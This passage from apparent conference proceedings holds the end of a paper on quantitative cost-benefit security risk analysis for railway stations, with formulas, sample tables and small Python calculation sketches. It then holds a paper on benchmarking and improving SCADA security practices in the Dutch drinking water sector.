security technologies against the achieved risk mitigation. The method has been developed and tested in the railway transportation domain, but it is general enough to be adopted for the analysis of other types of critical infrastructures. At the moment, we have implemented a fully working prototype of the tool to be adopted for risk evaluation and to support the design of security systems. The rest of this paper is organized as follows. Section 2 presents the method used for the analysis. Section 3 describes the aim and the features of the software tool we have developed. Section 4 provides an example application of quantitative risk analysis using the tool. Finally, Section 5 draws conclusions and provides some hints about future developments.
2 The Method
With reference to a specific threat, the quantitative risk R can be formally defined as follows:

R = P \cdot V \cdot D    (1)

where:
– P is the frequency of occurrence of the threat, which can be measured in [events/year];
– V is the vulnerability of the system with respect to the threat, that is, the probability that the threat will cause the expected consequences (damage);
– D is an estimate of the expected damage occurring after a successful attack, which can be expressed in euros [€].
The vulnerability V is a dimensionless parameter, since it represents the conditional probability

V = P(\mathrm{success} \mid \mathrm{threat})    (2)

Therefore, a quantitative way to express the risk associated with a specific threat is to measure it in lost euros per year [€/year]. The overall risk can be obtained as the sum of the risks associated with all threats. Despite the simplicity of (1), the involved parameters are not easy to obtain. The analysis involves both procedural and modeling aspects. Procedural aspects include brainstorming sessions, site surveys, design reviews, statistical data analysis, expert judgment, etc. Formal modeling languages which can be used to analytically compute P, V and D include Attack Trees, Bayesian Networks, Stochastic Petri Nets and possibly other formalisms able to take into account the uncertainty inherently associated with risk, as well as the possibility of strategic attacks [7]. In fact, the three parameters feature an inter-dependence which should be modeled, too. Protection mechanisms are able to reduce the risk through three main effects:
– Protective, aimed at the reduction of V;
– Deterrent, aimed at the reduction of P;
– Rationalizing, aimed at the reduction of D.
Therefore, by quantifying the listed effects it is possible to estimate the risk mitigation for any combination of threats and protection mechanisms. A possible way to compute risk mitigation is to associate threats and protection mechanisms by means of threat categories and geographical references, namely sites. A site can be considered a particular kind of critical asset (actually, an aggregate asset), sometimes defined as a "risk entity". Each threat happens in at least one site and, homogeneously, each protection mechanism protects at least one site. For a railway infrastructure, a site can be an office, a bridge, a tunnel, a parking area, a platform, a control room, etc. Under the assumptions that:
– threat T belongs to category C;
– threat T happens in (or passes through) site S;
– protection M is installed in site S;
– protection M is effective on threat category C;
it can be affirmed that M protects against T. Based on the above definitions, the overall risk to which the system is exposed can be expressed as follows:

R_T = \sum_i R_i \prod_j (1 - EP_{ji} \cdot COV_j)(1 - ED_{ji} \cdot COV_j)(1 - ER_{ji} \cdot COV_j)    (3)
where:
– R_T is the total mitigated risk;
– R_i is the initial risk associated with threat i (computed according to (1));
– EP_{ji} is an estimate of the protective effect of mechanism j on threat i;
– ED_{ji} is an estimate of the deterrent effect of mechanism j on threat i;
– ER_{ji} is an estimate of the rationalizing effect of mechanism j on threat i;
– COV_j is a measure of the coverage of mechanism j (e.g., the percentage of the physical area or perimeter of the site).

Fig. 1. Risk evaluation using sample data
The values of the parameters expressing coverage and effectiveness are in the range [0..1]. The formula can be validated using sample data and boundary analysis: for instance, when both the coverage and one of the effectiveness parameters are set to 1, the risk is mitigated to 0, as expected; conversely, if either the coverage or all the effectiveness parameters are set to 0, the risk is not mitigated at all. Fig. 1 reports an example risk evaluation based on (3) using sample data. In this evaluation it is assumed that a single protection mechanism is used and all other data is kept constant. The cost/benefit index can be defined simply as the balance between the investment in security mechanisms and the achieved risk mitigation:

EB = risk reduction − total investment in security = \left( \sum_i R_i - R_T \right) - \sum_j C_j    (4)

where:
– EB is the Expected Benefit, which can be positive or negative;
– C_j is the cost of protection mechanism j, obtained considering all the significant costs (acquisition, installation, management, maintenance, etc.).

Therefore, the return on investment can be obtained from the expected benefit EB by considering the cost of the invested capital (which depends on the rate of interest, the years to pay-off, possible external funding, etc.). Expressions (3) and (4) need to be computed starting from a database of attack scenarios, sites, protection mechanisms and related significant attributes.
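The computations behind (1), (3) and (4) are straightforward to prototype. The following Python sketch evaluates the mitigated risk and the expected benefit for sample inputs loosely inspired by the tables in Section 4; the data layout and function names are our own assumptions, and the tool itself is implemented in Java (see Section 3).

```python
def mitigated_risk(threats, protections, effects, coverage):
    # threats: {i: (P, V, D)}; effects: {(j, i): (EP, ED, ER)};
    # coverage: {j: COV_j in [0, 1]}.
    total = 0.0
    for i, (p, v, d) in threats.items():
        risk = p * v * d                      # Eq. (1): R_i = P * V * D
        for j in protections:
            ep, ed, er = effects.get((j, i), (0.0, 0.0, 0.0))
            cov = coverage[j]
            # Eq. (3): each mechanism scales the risk by its three effects.
            risk *= (1 - ep * cov) * (1 - ed * cov) * (1 - er * cov)
        total += risk
    return total

def expected_benefit(threats, protections, effects, coverage, costs):
    # Eq. (4): risk reduction minus total annual investment in security.
    initial = sum(p * v * d for p, v, d in threats.values())
    reduced = initial - mitigated_risk(threats, protections, effects, coverage)
    return reduced - sum(costs[j] for j in protections)

# Sample values loosely inspired by Tables 1 and 2 (graffitism vs. fence).
threats = {1: (60, 0.9, 500.0)}               # P=60/year, V=0.9, D=500 euro
effects = {(1, 1): (0.9, 0.3, 0.2)}           # EP, ED, ER of mechanism 1
print(expected_benefit(threats, [1], effects, {1: 0.9}, {1: 1000.0}))
```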
The management of such data and the computation of the results are performed by an automatic tool, which is described in detail in the next section.
3 The Tool
A tool has been developed which automatically manages risk data and evaluates risk and benefit indices starting from input data. The tool has been named simply Q-RA (Quantitative Risk Analysis), to be pronounced [kura] (sounding like the Italian for "cure"). In particular, the inputs of the tool are:
– A list of threats, characterized by:
  • threat identifier;
  • short description of the attack scenario (including the adversary category, required tools, etc.);
  • threat category (e.g., vandalism, theft, sabotage, terrorism, flooding, etc.);
  • initial estimated P, V and D;
  • site (geographical reference).
– A list of protection mechanisms, characterized by:
  • protection mechanism identifier;
  • short description of the mechanism;
  • list of threat categories on which the mechanism is effective;
  • expected protective (EP_{ji}), deterrent (ED_{ji}) and rationalizing (ER_{ji}) effectiveness;
  • estimated coverage (COV);
  • site (geographical reference);
  • annual cost (acquisition, management, maintenance, etc.).
A database is used to store and correlate the input data. Data referring to economic aspects (number of years to dismissal, rate of interest, etc.) is also managed. The tool provides features allowing the user to insert the inputs, update them to modify some parameters (e.g., the frequency of threats) and, finally, remove them. Parameters can be chosen using average or worst-case considerations. Sensitivity analysis can be performed by acting on input data ranges in order to evaluate the effect of uncertainty intervals on the computed results and possibly define lower and upper bounds. The tool elaborates the data according to the relationships defined in the database (in particular, using the common attributes of site and threat category) and the mathematical models of (3) and (4), providing:
– the risk associated with each threat (R_i) and the overall risk (R_T);
– the total risk reduction considering all the threats;
– the annual cost of each single protection mechanism and of the whole security system;
– the annual cost/benefit balance (EB).
The points listed above are part of the informal functional requirements specification. Application-specific requirements have also been added, like the possibility of specifying a day/night attribute for both threats (some scenarios cannot happen when the service is interrupted, e.g. when a subway station is closed to the public) and protection mechanisms (some mechanisms, e.g. motion detection, can be activated only when the service is interrupted). Non-functional requirements of the tool include user friendliness, data import/export facilities using standard formats (e.g., CSV, Comma Separated Values), platform independence, use of freeware software (where possible), and user identification and rights management (still to be implemented). Some implementation details are reported in the following. The software design was performed using an object-oriented approach based on the Unified Modeling Language (UML) and the Java programming language. In order to guarantee the persistence of objects (threats, protection mechanisms and sites), a relational database (based on MySQL) was designed starting from Entity-Relationship (E-R) diagrams. The GUI (Graphical User Interface) of the tool is web-based, exploiting JSP (JavaServer Pages) and Apache Tomcat technologies. As an example, the conceptual class diagram for the specific domain is reported in Fig. 2, where the attributes and interrelationships of the entities described in the previous section are shown graphically.
Fig. 2. Conceptual class diagram
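For readers who prefer code to diagrams, the entities of Fig. 2 can be transcribed into a few record types. The sketch below uses Python dataclasses purely for illustration (the actual tool uses Java classes persisted in MySQL); the attribute names are our own rendering of the attributes discussed above.

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Site:
    name: str                      # geographical reference, e.g. "Platform"

@dataclass
class Threat:
    ident: int
    description: str
    category: str                  # e.g. "Vandalism", "Terrorism Expl."
    p: float                       # frequency [events/year]
    v: float                       # initial vulnerability [0..1]
    d: float                       # expected damage [euro]
    site: Site
    day_night: str = "both"        # application-specific attribute

@dataclass
class ProtectionMechanism:
    ident: int
    description: str
    categories: List[str]          # threat categories it is effective on
    ep: float                      # protective effectiveness
    ed: float                      # deterrent effectiveness
    er: float                      # rationalizing effectiveness
    cov: float                     # coverage [0..1]
    annual_cost: float             # euro/year
    site: Site

def protects(m: ProtectionMechanism, t: Threat) -> bool:
    # M protects against T when they share the site and M is effective
    # on T's threat category (Section 2).
    return m.site == t.site and t.category in m.categories
```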
4 Example Application
Let us consider a case study of a railway or subway station. The following threats against the infrastructure should be considered:
– damage to property and graffitism (vandalism);
– theft and aggression against personnel and passengers (micro-criminality);
Table 1. Attack scenarios considered in the example application

| Threat Id | Threat Description | Threat Category | Site | Est. P [#/Year] | Est. V_Init | Exp. Asset D [K€] | Exp. Service D [K€] |
|---|---|---|---|---|---|---|---|
| 1 | Graffitism | Vandalism | Station Ext. | 60 | 0.9 | 0.5 | 0 |
| 2 | Theft of PCs | Theft | Tech. Room | 4 | 0.8 | 8 | 6 |
| 3 | Glass Break | Vandalism | Station Ext. | 12 | 1 | 0.5 | 0 |
| 4 | Bombing | Terrorism Expl. | Platform | 0.01 | 1 | 600 | 300 |
| 5 | Hacking | Sabotage | Tlc Server | 2 | 0.8 | 0 | 10 |
| 6 | Gas Attack | Terrorism Chem. | Platform | 0.01 | 1 | 10 | 150 |
| 7 | Furniture Damage | Vandalism | Hall | 70 | 1 | 0.1 | 0 |
| 8 | Infrastruct. Damage | Vandalism | Platform | 50 | 1 | 0.1 | 0 |
| 9 | Physical Damage | Sabotage | Platform | 4 | 0.9 | 5 | 0 |
Table 2. Protection mechanisms considered in the example application

| Prot. Id | Countermeasure Description | Acq. Cost [K€] | Manag. Cost [K€/Year] | Site | COV | Threat Category | EP | ED | ER |
|---|---|---|---|---|---|---|---|---|---|
| 1 | Alarmed Fence | 10 | 1 | Station Ext., Station Int. (Night) | 0.9 | Vandalism | 0.9 | 0.3 | 0.2 |
|   |   |   |   |   |   | Theft | 0.9 | 0.3 | 0.2 |
|   |   |   |   |   |   | P. Sabotage | 0.9 | 0.3 | 0.2 |
| 2 | Volumetric Detector | 5 | 1 | Tech. Room | 1 | Theft | 0.8 | 0.6 | 0.2 |
| 3 | Video-surveillance (Internal) | 150 | 20 | Hall, Platform | 0.95 | Vandalism | 0.4 | 0.6 | 0.3 |
|   |   |   |   |   |   | Theft | 0.6 | 0.6 | 0.3 |
|   |   |   |   |   |   | Sabotage | 0.6 | 0.6 | 0.8 |
|   |   |   |   |   |   | Terrorism Expl. | 0.4 | 0.3 | 0.6 |
|   |   |   |   |   |   | Terrorism Chem. | 0.4 | 0.3 | 0.6 |
| 4 | Chem. Detector | 50 | 2 | Platform | 0.9 | Terrorism Chem. | 0.6 | 0.2 | 0.4 |
| 5 | Intrusion Detection System | 1 | 0.5 | Tlc Server | 1 | L. Sabotage | 0.9 | 0 | 0 |
| 6 | Explosive Detector | 50 | 2 | Station Int.* | 1 | Sabotage | 0.8 | 0.4 | 0.1 |
|   |   |   |   |   |   | Terrorism Expl. | 0.8 | 0.1 | 0.1 |

* The detectors are physically installed near the turnstiles, but the protection is effective on the whole station interior.
– manumission and forced service interruption (sabotage);
– bombing or spread of NBCR¹ contaminants (terrorism).

¹ Nuclear, Bacteriologic, Chemical, Radiologic.

Let us consider the example scenarios reported in Table 1 and the protection mechanisms listed in Table 2, both referring to a specific station. It is assumed that the values were obtained by analyzing historical data on successful and unsuccessful attacks before and after adopting specific countermeasures (such data is usually available for comparable installations).
Fig. 3. The Q-RA input data mask for protection mechanisms
Fig. 4. Q-RA output data presentation for the example application
The expected damage relates to the single attack and is computed by predicting the expense needed to restore the assets and the possible consequences of service interruption (no human injury or loss is considered). The estimated annual cost of the protection
mechanisms also accounts for maintenance and supervision, while acquisition and installation costs are accounted for separately. Please note that the effect of protection mechanisms may vary according to the threat category. Furthermore, none of the specified values should be considered real: the choice of real values would require an extensive justification, possibly via model-based analysis, which is beyond the scope of this paper. Fig. 3 reports a screenshot of the GUI showing the input mask for the attributes of protection mechanisms, while Fig. 4 reports the results of the example application computed by the tool. Under the assumptions of the example, the positive expected benefit resulting from the adoption of the protection mechanisms clearly justifies the investment, the total benefit being 36,722 €/year.
5 Conclusion
In this paper, a method and a support tool for the quantitative security risk analysis of critical infrastructures have been described. The method has been developed to address the risk management of railway infrastructures, mainly considering physical threats. However, we believe that the considerations at the base of the method neither limit its application to a specific infrastructure nor prevent the analysis of logical security. For instance, a site can be thought of as a logical point at which a hacker attack can be performed by exploiting one or more flaws. For attacks involving persons (injury or death), a quantification of the consequences, though possible, is not generally accepted; therefore, qualitative approaches can be applied separately to such classes of threats. The Q-RA tool is also intended for the integration of qualitative analyses by means of associative tables [10]. The automation provided by the tool also eases the analysis of parametric sensitivity, in order to assess how error distributions in the input values affect the overall results. Finally, it is possible to extend the tool with cost/benefit optimization functionalities (e.g., based on genetic algorithms) that consider limited budget constraints. In this way, the optimal set of protection mechanisms minimizing the risk can be determined automatically.
References
1. ASIS International: General Security Risk Assessment Guideline (2008), http://www.asisonline.org/guidelines/guidelinesgsra.pdf
2. Broder, J.F.: Risk Analysis and the Security Survey. Butterworth-Heinemann (2006)
3. Garcia, M.L.: Vulnerability Assessment of Physical Protection Systems. Butterworth-Heinemann (2005)
4. Lewis, T.G.: Critical Infrastructure Protection in Homeland Security: Defending a Networked Nation. John Wiley, Chichester (2006)
5. Meritt, J.W.: A Method for Quantitative Risk Analysis (2008), http://csrc.nist.gov/nissc/1999/proceeding/papers/p28.pdf
6. Moteff, J.: Risk Management and Critical Infrastructure Protection: Assessing, Integrating, and Managing Threats, Vulnerabilities and Consequences. CRS Report for Congress, The Library of Congress (2004)
7. Nicol, D.M., Sanders, W.H., Trivedi, K.S.: Model-based evaluation: from dependability to security. IEEE Transactions on Dependable and Secure Computing 1(1), 48–65 (2004)
8. SANDIA National Laboratories: A Risk Assessment Methodology for Physical Security. White Paper (2008), http://www.sandia.gov/ram/RAM%20White%20Paper.pdf
9. Srinivasan, K.: Transportation Network Vulnerability Assessment: A Quantitative Framework. Southeastern Transportation Center - Issues in Transportation Security (2008)
10. U.S. Department of Transportation: The Public Transportation Security & Emergency Preparedness Planning Guide. Federal Transit Administration, Final Report (2003)
11. U.S. Department of Transportation: Transit Security Design Considerations. Federal Transit Administration, Final Report (2004)
12. Wilson, J.M., Jackson, B.A., Eisman, M., Steinberg, P., Riley, K.J.: Securing America's Passenger-Rail Systems. Rand Corporation (2007)
Assessing and Improving SCADA Security in the Dutch Drinking Water Sector
Eric Luiijf1, Manou Ali2, and Annemarie Zielstra2
1 TNO Defence, Security and Safety, Oude Waalsdorperweg 63, 2597 AK The Hague, The Netherlands
[email protected], www.tno.nl
2 ICTU programme National Infrastructure against Cyber Crime (NICC), Wilhelmina van Pruisenweg 104, 2595 AN The Hague, The Netherlands
{manou.ali,annemarie.zielstra}@ictu.nl, www.samentegencybercrime.nl
Abstract. International studies have shown that information security for process control systems, in particular SCADA, is weak. As many critical infrastructure (CI) services depend on process control systems, any vulnerability in the protection of process control systems in CI may result in serious consequences for citizens and society. In order to understand their strengths and weaknesses, the drinking water sector in The Netherlands benchmarked the information security of their process control environments. Large differences in their security postures were found. Good Practices for SCADA security were developed based upon the study results. This paper will discuss the simple but effective approach taken to perform the benchmark, the way the results were reported to the drinking water companies, and the way in which the SCADA security good practices were developed. Figures shown in this paper are based on artificially constructed data since the study data contain company and national sensitive information.
1 Introduction
1.1 The Dutch National Infrastructure (against) Cyber Crime
In our digital world, we want to be able to work securely, and protection is the key to this. There is certainly a need to investigate and prosecute cybercrime, but a reactive response alone is not the complete solution. Only when government, investigatory authorities and the private sector join forces and exchange information about new threats will society be able to keep up with the cyber criminals. Embracing the principle of 'learning by doing', the Dutch government and the private sector took the first steps towards developing a successful strategy against cybercrime in 2006 with the establishment of the National Infrastructure against Cybercrime programme (Nationale Infrastructuur ter bestrijding van Cybercrime, NICC). The NICC infrastructure consists of several components: a contact point, a reporting unit, trend watching, monitoring and detection, information distribution, education, warning, development, knowledge sharing, surveillance, prevention, termination, and mitigation. The NICC further strengthens this infrastructure
by hosting the Cybercrime Information Exchange, in which public and private organizations share sensitive information, and by developing and supporting practical projects and trials that both solve concrete problems and generate knowledge about cybercrime. The Cybercrime Information Exchange information-sharing model is based on the one designed by the UK's Centre for the Protection of National Infrastructure (CPNI). The NICC Information Exchange function can be pictured as a 'flower'. The heart of the flower is made up of government bodies, like the police, intelligence services, GOVCERT.NL and the NICC itself. Critical infrastructure (CI) sectors and some other major industrial communities that heavily rely upon ICT can be thought of as the petals of the flower. The different sectors chair their own 'petal', decide which parts of a meeting can be attended by the government bodies, and decide which information is sharable outside their sector 'petal'. The confidentiality of the exchanged information is maintained by an agreed set of dissemination rules following the Traffic Light Protocol [1].

1.2 The Dutch Drinking Water Sector
The current Dutch drinking water sector originates from extensive mergers of local municipal utilities. In 1952, Dutch society was serviced by 198 drinking water companies, a number that had been reduced to ten companies by 2007 [2]. After the 9/11 attacks in 2001, the Dutch drinking water sector collaboratively undertook major efforts to increase the physical security of their drinking water plants and systems. When the NICC was established in 2006, the drinking water sector was one of the first CI sectors to sign up as a sector petal to address its cyber risk. One of the information security issues the sector put onto the NICC agenda concerns SCADA security. SCADA means Supervisory Control and Data Acquisition, a term which is used in this paper as an overarching term for all process control systems and networks that are used to control the collection of raw water, the purification process, the drinking water quality, and the transport and distribution of the drinking water to the customers. Together with the NICC, the drinking water sector decided on a project that had to (1) investigate the current sector-wide state of SCADA information security, (2) analyze and report the results, and (3) develop a set of good practices providing a sector-wide information security baseline for the SCADA/process control environment.

1.3 Outline
In Section 2, we discuss the development of a questionnaire that has been used to investigate the SCADA security posture of the drinking water sector. In Section 3 we highlight the analysis approach and the way the results were reported to the drinking water sector while maintaining anonymity. Obviously, the individual company information and the sector-wide results are classified. In Section 4, however, we are able to present a high-level overview of the main areas of SCADA security concern that were identified in the Dutch drinking water sector. As requested by the drinking water sector NICC petal, a SCADA Security Good Practices report has been developed addressing these security weaknesses. Its development is described in Section 5. Section 6 contains the conclusions.
2 Investigation Approach by Questionnaire
To investigate the current state of SCADA information security in the drinking water sector, a four-page questionnaire with about forty open and closed questions was developed, covering the main areas of security concern derived from the general SCADA security issues reported in [3] and inspired by documents like [4]. The main areas addressed by the questionnaire are: (1) the drinking water company security policies and security posture, (2) information security architecture aspects, and (3) operational and system management issues. Fifteen questions specifically address the organization and its security posture, covering aspects like the security policy for SCADA (if any), how it relates to the general company information security policy and implementation, and how it relates to physical security. Other aspects cover various controls mentioned in the ISO/IEC Code of Practice for information security management [5], the use of security standards, and whether regular audits take place or not. Another fourteen questions address the information security architecture for the SCADA environment. They focus on the security of information transfers and communication. Areas covered are the physical and logical separation of the SCADA environment and the office automation environment, secure communication with remote locations, types of communication technologies in use, remote access, third-party access to the infrastructure, etcetera. The remaining ten questions address operational and system management issues such as the way the organization deals with the security awareness of its own and third-party personnel, password change policies, EDP audits, earlier incidents (if any, and if one wants to report them), business continuity plans, and patch and malware policies. All drinking water companies participating in the NICC drinking water petal were asked to fill in the questionnaire. The NICC supported this process with a face-to-face meeting to clarify any questions that could arise from the questionnaire. As two of the Dutch drinking water companies share their information and communication technology (ICT) and SCADA services, a joint answer was returned for these two companies. Two companies returned their questionnaire late, so their results were not taken into account in the analysis described in Section 3; their results were processed afterwards. To protect the completed questionnaires with sensitive company information, they are classified "NICC Confidential" and are handled and stored accordingly.
3 Analysis and Reporting
A simple spreadsheet was developed to contain and visualize the answers given to the questions in the questionnaire. Numbers randomly assigned to the ten Dutch drinking water companies formed the basis for the anonymous treatment of the returned questionnaires. The company number randomly assigned to each individual drinking water company maps its replies in the returned questionnaire to a specific column in the analysis spreadsheet. The mapping between the companies and the randomly assigned numbers is stored in a vault together with the returned questionnaires. This approach guarantees
One drinking water company uses a single, combined network for both the SCADA operations and the office automation systems. Risk: this is a very risky way of operating SCADA systems. Any technical failure in one of the office automation systems, or malware such as a virus or Trojan horse, may stop the SCADA system. Such failures with serious consequences have been reported in recent years by the power and petrochemical sectors.
Fig. 1. Report example for process control and office automation network entanglement (artificial example)
the anonymous analysis of the returned questionnaire data and the protection of the sensitive data of the individual companies. The returned data was first analyzed from a sector-wide view. The analyzed results have been reported back to the drinking water sector in a classified NICC report. For each of the twenty-one potentially weak security areas, a pie or bar chart provides sector-wide insight into the number of companies that have given a certain reply. An artificial example is shown in Figure 1. An explanation accompanying each of the charts discusses both the result status and the potential risk related to a certain answer. In order to raise awareness, each of the paragraphs describing potentially very insecure behavior is accompanied by a red flag symbol. In the same way, a yellow-flagged paragraph denotes some security risk, and a green flag denotes a secure way of operating. The questionnaire method, however, carries the risk that the outcome may point to a certain risky behavior by a drinking water company which has in fact been mitigated by a set of additional security measures not mentioned by the respondents. On the other hand, such alternative security measures may not fully take away the high risk. As none of the drinking water companies objected to the draft analysis report, such sets of additional measures either do not exist at all or at least are not common. Another risk of using questionnaires could be that the companies would not give sincere answers. The set-up of the questionnaire, with a mix of open and closed questions, covertly tried to detect such insincere answers. The analysis of all answers did not expose any insincerity. The answers certainly exposed serious
Fig. 2. Radar chart showing eight organizational security policy issues (artificial example), with the minimum and average sector performances
weaknesses within each of the companies. Moreover, the answers to the question about what risk would keep the manager awake often showed that managers were worried about certain bad practices reported elsewhere in the questionnaire. Therefore, both the questionnaire as an elicitation method and the way we reported the observed risky behaviors back to the drinking water sector have proved to be simple but effective. In addition to the individual issues, three comprehensive radar charts present the current sector-wide security posture, respectively showing eight organizational security policy and management issues, six communication and networking issues, and five system and security management issues. Figure 2 shows an artificial radar chart example for the organizational security policy and management issues. Each of these radar charts shows the sector-wide average and the worst individual company performance. Each metric value is derived from an expert judgment on the security risk for the specific metric, expressed as a number between zero (worst, totally insecure score) and one (perfect security). For this expert judgment, several TNO security experts with a background in process control security and general information security discussed the specific security issue and came to a consensus about a metric value for each of the possible answers for that issue, without knowing beforehand what the companies had replied. For instance, a zero would be given to a drinking water company having a combined SCADA/process control and office automation network, a 0.4 for shared logically separated trunks (e.g., VPNs) between two office/plant locations, and a one (perfect score) for physically and logically separated office and process control networks. This whole process was intended to be lightweight, resulting
Fig. 3. The drinking water sector ’school report’ (artificial example)
in indicative but objective results that could help the drinking water companies to identify the areas with their highest vulnerabilities. In order to benchmark the various drinking water companies against each other with respect to SCADA and process control security, 'school report' marks are calculated for their overall organizational security policy, communication and networking security, and system and security management postures. Each of the respective eight, six and five metrics is multiplied by a relative weight and totaled for each of the three areas: organizational security policy, communication and networking security, and system and security management. A ten is the perfect score; a zero is the lowest score possible. Again, the respective weight values were determined by the consensus of several security experts about the relative importance of the axis categories per issue area (radar chart). The overall score is simply the sum of the marks of the three areas divided by three (see the artificial example in Fig. 3). The analysis results, the sector-wide radar charts, and a chart with all the individual, but anonymous, 'school report' marks were presented in a NICC meeting to the drinking water sector representatives. The approach allowed an open discussion without anyone being the best or the worst in class. At the end of the meeting, all representatives received a closed envelope with radar charts showing their individual company results, which could be compared with the sector average and minimum performances. The envelope also contained the school report chart stating which anonymous company number was theirs.
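The scoring scheme can be summarized in a few lines of code. The sketch below is an illustrative reconstruction of the weighted 'school report' computation described above; the metric values, weights and area names are artificial, as the real weights and study data are classified.

```python
def school_report(metrics, weights):
    # metrics: per-area lists of expert-judged values in [0, 1];
    # weights: matching relative weights per area (summing to 1).
    # Each area mark is the weighted total scaled to a 0-10 scale;
    # the overall mark is the plain average of the three areas.
    marks = {}
    for area, values in metrics.items():
        marks[area] = 10 * sum(v * w for v, w in zip(values, weights[area]))
    marks["overall"] = sum(marks.values()) / len(metrics)
    return marks

# Illustrative values for one company (not study data).
metrics = {
    "organisational": [0.8, 0.4, 1.0, 0.6, 0.5, 0.9, 0.2, 0.7],
    "networking":     [0.4, 1.0, 0.6, 0.3, 0.8, 0.5],
    "system_mgmt":    [0.9, 0.2, 0.6, 0.7, 0.4],
}
weights = {a: [1.0 / len(v)] * len(v) for a, v in metrics.items()}
print(school_report(metrics, weights))
```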
4 Areas of SCADA Security Concern
For obvious reasons, the individual company and detailed sector-wide results are classified. In general, however, we can discuss SCADA security good practices and some of the concerns regarding the current security posture of some of the SCADA and process control systems in the drinking water sector.

4.1 General Observations
When considering the sector-wide results, we found that some drinking water companies perform far better than the sector average. But even for the best-in-class companies, the individual radar charts sometimes show a black spot in controlling their security risk. These black spots are easy to spot, as they are visible as missing segments in the radar charts. For that reason, the three radar charts help the responsible managers (general company management, network and telecommunication management, and process control technical management, respectively) to focus on such weak areas in their individual drinking water company. The cross-sector school report chart shows large individual company variances with regard to the sector averages. This caused the drinking water sector to ask for the development of a set of SCADA Security Good Practices. Moreover, we learned that the school report has been used as a means to leverage boardroom attention and support for immediate action to improve the SCADA security posture in some of the participating drinking water companies.

4.2 Organizational Aspects and Organizational Policy Issues
A good practice for companies is to use the ISO/IEC Code of Practice for information security management [5] as a basis for information security management. All companies in the Dutch drinking water sector use the Code of Practice, or a derivative thereof, in their office automation environment. In the process control domain, however, the use of this Code of Practice is not yet very common. Where it is applied, we found no specific SCADA policies extending the ISO/IEC 17799/27002 [5] controls to deal with specific process control issues such as 24/7 operations [6,7]. According to [5], security awareness processes for all ICT users shall be in effect. For the process control environment (operators, system managers, automation personnel), such security awareness programmes are not yet common practice. Another good practice is to state one's security requirements when acquiring new hardware, software, and related maintenance and support services. The drinking water sector results show that this is a black spot for the SCADA domain. We expected that the increasing importance of risk management frameworks such as Sarbanes-Oxley would cause the SCADA risk to be recognized as a business risk to be managed at the top management level of the drinking water companies. It turned out that this is not yet the case. Accordingly, most companies reported the lack of a regular (yearly) EDP audit of the SCADA process control environment. Considering Dutch penal law, this may hamper the prosecution of possible cyber crime in the SCADA environment of those companies. Moreover, the lack of
a regular external security audit may decrease management attention for a security posture properly related to the business risk. Fortunately, it can be concluded that most drinking water companies have taken redundancy and other business continuity measures for their SCADA environment, although some companies have not yet discussed priority deliveries with their hardware suppliers in case of a major loss of equipment.

4.3 Networking and Telecommunication
A good practice is to strictly separate the office automation and the SCADA environments and to have a strictly controlled data exchange between these environments, if one is required at all. The worst network architecture case is a mixed office automation and SCADA network, where a simple disturbance in the office automation hardware or software, e.g. a malfunctioning network interface card, may bring down all SCADA operations. Also, a remote operations link which mixes both types of traffic may cause a loss of SCADA operations when the office automation traffic load across the link becomes extremely high (overload), e.g. as a result of a malware attack [3]. Unfortunately, such architectural errors were reported by the drinking water sector. Another good practice is that remote access to the SCADA environment shall be avoided at all times, or at least be under strict security scrutiny. The reality is that most drinking water companies allow remote access by their own personnel and the personnel of their suppliers for troubleshooting. The risk stemming from such remote access is not always balanced with an appropriate set of security measures. Most of the drinking water companies allow personnel of third parties, such as SCADA manufacturers, to connect equipment such as laptops to the operational SCADA network without any oversight or pre-conditions. Remarkably, the managers responsible for the SCADA domain reported that potential malware brought into the system by third-party personnel is exactly what worries them at night!

4.4 System and Security Management
The ISO/IEC Code of Practice [5] requires that system management keep their systems up to date with respect to security. A security patching policy and anti-malware measures are nowadays common in the office automation domain to meet the Code of Practice requirements. As was already reported in [3], this is not common practice in the SCADA environment, and the Dutch drinking water sector shows the same behavior. Patches are often applied only reluctantly; sometimes even the SCADA/process control vendors need to apply pressure to get security holes patched. The ISO/IEC Code of Practice [5] has a strict set of controls for password management. Earlier reports on SCADA security, e.g. [3], state that this area is weak in the control system environment. Not surprisingly, unchanged default passwords, the absence of individual passwords, and infinitely long password change intervals were found. On the other hand, some drinking water companies have overcome the 24/7 barriers, abandoned group passwords and use frequently changed individual passwords. Within the NICC drinking water petal, such drinking water companies are invited to present
their way of operating as a stepping stone for their colleagues to implement the same secure password policies.
5 Development of the SCADA Security Good Practices
Based upon the results of the analysis described in the previous sections, security expert experiences, and existing literature such as [3] through [7], SCADA Security Good Practices for the Drinking Water Sector were developed, in both a Dutch [8] and an English [9] version. These good practice documents start with a short introduction to SCADA and process control, its vulnerability, and some examples of SCADA failures affecting drinking water systems. The documents continue by outlining eleven good practices for company management and 28 good practices for technical process automation management.
6 Conclusions
A relatively straightforward and effective approach has been taken to assess, analyze, and help improve the sector-wide SCADA and process control security posture in The Netherlands. The approach included a way to assure the anonymity of the individual drinking water company inputs and their individual scores, while still being able to discuss the information security weaknesses in a sector-wide setting. The individual results of the drinking water companies have been presented in a way that allows them to discuss their security posture relative to the sector averages in their organization's board room. SCADA Security Good Practices have been developed which allow the drinking water sector to enhance its security posture. Using the radar chart views, detailed discussions of the risk they take, and the good practices to mitigate that risk, drinking water companies can compare their current security state with the drinking water sector average. As the analysis phase findings for the drinking water sector match the vulnerabilities described in earlier documents like [3] and [4], the developed good practices may be of use to (1) the drinking water sector in other nations, and (2) other similar critical sector services applying the same technologies (e.g., waste water, sewage). Due to the successful results in the drinking water sector, the same questionnaire will be used as a basis to perform similar investigations in the Dutch energy sector and in the Rotterdam harbor in the first half of 2008. Comparison of the drinking water and energy sector results shows a number of similarities in the SCADA/process control security weaknesses of both sectors.
Acknowledgements The national study [3] on the vulnerability of process control systems at large and SCADA in particular was commissioned by the Dutch Ministry of Economic Affairs. The study on SCADA information security in the drinking water sector was commissioned by the National Infrastructure (against) Cyber Crime (NICC) programme of the ICTU (www.ictu.nl).
References
1. CPNI: Traffic Light Protocol (TLP) (2005)
2. VEWIN, http://www.vewin.nl (last visited March 24, 2008)
3. Luiijf, H.A.M., Lassche, R.: SCADA (on)veiligheid, een rol voor de overheid? [SCADA (in)security, a role for the Government?], TNO/KEMA report [Unclassified] (June 2006)
4. Department of Energy (DoE): 21 Steps to Improve Cyber Security of SCADA Networks. Office of Energy Assurance, Office of Independent Oversight and Performance Assurance, U.S. Department of Energy, USA (2005), http://www.oe.netl.doe.gov/docs/prepare/21stepsbooklet.pdf
